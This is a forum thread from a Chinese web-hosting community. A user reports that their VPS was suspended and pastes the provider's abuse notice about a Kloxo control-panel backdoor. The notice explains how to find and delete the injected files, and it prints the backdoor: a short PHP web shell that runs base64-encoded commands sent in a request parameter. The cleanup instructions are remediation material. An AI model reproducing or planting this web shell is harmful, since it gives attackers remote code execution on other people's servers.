全球主机交流论坛

标题: 求助 VPS给停了,,不肯开通。。。 [打印本页]

作者: vielang    时间: 2014-2-8 09:44
标题: 求助 VPS给停了,,不肯开通。。。
过年回家,photonvps 停了我的VPS,现在死不肯开通,都不知怎办,VPS上,过年前网站的数据也没有备份,现在想叫开通后备份下,下面为对话,现怎办呢?


photonvps
This is a easy fix give me the credentials ill fix it for you.




I now know is the VPS control panel of a loophole, but now I cannot link to repair, also want to put the site data backup, backup and then reinstall the VPS, in the control panel, can you help me to open the VPS, let me make this operation?



photonvps
You are not reading the emails we sent you that your kloxo has an exploit that we needed you to clean it? I am sorry but if you ignore us we wont be able to help you with these type of abuse.
Your kloxo has an exploit you needed to clean it but you ignore us so we suspended you to stop attacks from your VM. If you want us to help you give us your server credentials, otherwise we are going to terminate this account.




Why stop my VPS




photonvps
Hello,

You account has been suspended because you did not respond to the abuse ticket within 24 hours.

Thank you.

Hello,

This is abuse department sending you an important email alert of a backdoor botnet exploit with your kloxo panel that needs fixing ASAP!

This problem was brought to our attention by alerts that we received from banks that were receiving attacks from your control panel and other forms of virus detections.

Fortunately this exploit can be fixed by following the instructions listed below.

Find files that were modified on the 27th ot this month.

find /home/kloxo/httpd/default/* -mtime -4 -iname "*.php"

You should get something similar to this

/home/kloxo/httpd/default/default.php
/home/kloxo/httpd/default/defuzx.php
/home/kloxo/httpd/default/emptzx.php


the defuzx.php, and emptzx.php files were uploaded, and are the exploit that needs deleting.

You can check inspect the backdoor code that was injected by the hacker to gain access to your account.


<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['36753c7000fab6fec6700cbf0ef8'])!=NULL){eval(base64_decode($_REQUEST['36753c7000fab6fec6700cbf0ef8']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>

To remove the exploit we do

rm -fr /home/kloxo/httpd/default/emptzx.php

rm -fr /home/kloxo/httpd/default/defuzx.php

make sure to only delete the files that were modified on the 27. the default.php file change due to the kloxo being hack so to fix that we need to update kloxo and change the admin password.

Update kloxo “/scripts/upcp”
Then finalize the fix by changing your kloxo admin panel password.

作者: 分享吧    时间: 2014-2-8 09:48
貌似没说不给开通吧,  叫你修复一下漏洞 ?
作者: paopao00    时间: 2014-2-8 09:48
被挂马?
作者: vielang    时间: 2014-2-8 09:50
分享吧 发表于 2014-2-8 09:48
貌似没说不给开通吧,  叫你修复一下漏洞 ?

问题,是链接不上,修复不了
作者: vielang    时间: 2014-2-8 09:52
paopao00 发表于 2014-2-8 09:48
被挂马?

好像是面板问题,KLOXO有漏洞,没有及时修复。
作者: 分享吧    时间: 2014-2-8 09:59
vielang 发表于 2014-2-8 09:50
问题,是链接不上,修复不了

好吧, 我拙计了。。
作者: kwx    时间: 2014-2-8 11:20
Kloxo最近集体废了




欢迎光临 全球主机交流论坛 (https://sunk.eu.org/) Powered by Discuz! X3.4